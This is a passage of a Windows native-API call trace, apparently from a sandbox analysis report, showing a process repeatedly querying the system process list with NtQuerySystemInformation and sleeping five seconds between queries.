ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.768] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.771] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.771] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.782] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.782] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.783] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.783] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.783] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.785] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.785] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.798] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.798] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.798] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.799] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.799] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.802] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.802] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.813] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.813] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.814] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.814] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.816] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.829] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.829] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.829] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.832] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.832] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.844] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.845] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.845] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.846] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.849] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.849] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.861] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.861] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.861] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.864] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.876] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.877] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.877] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.881] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.892] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.892] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.892] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.893] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.895] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.896] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.907] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.908] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.908] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.908] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.909] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.911] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.912] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.923] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.924] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.924] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.927] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.928] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.938] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.939] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.939] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.941] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.955] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.957] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.957] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0155.969] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0155.970] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0155.970] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0155.971] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0155.971] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0155.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0155.974] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.009] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.009] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.012] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.013] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.016] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.016] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.017] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.017] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.019] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.031] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.032] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.034] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.035] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.047] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.048] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.048] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.051] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.052] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.063] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.063] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.064] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.064] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.066] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.066] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.079] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.080] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.080] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.080] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.083] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0156.097] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0156.098] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0156.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0156.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0156.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0156.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0156.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 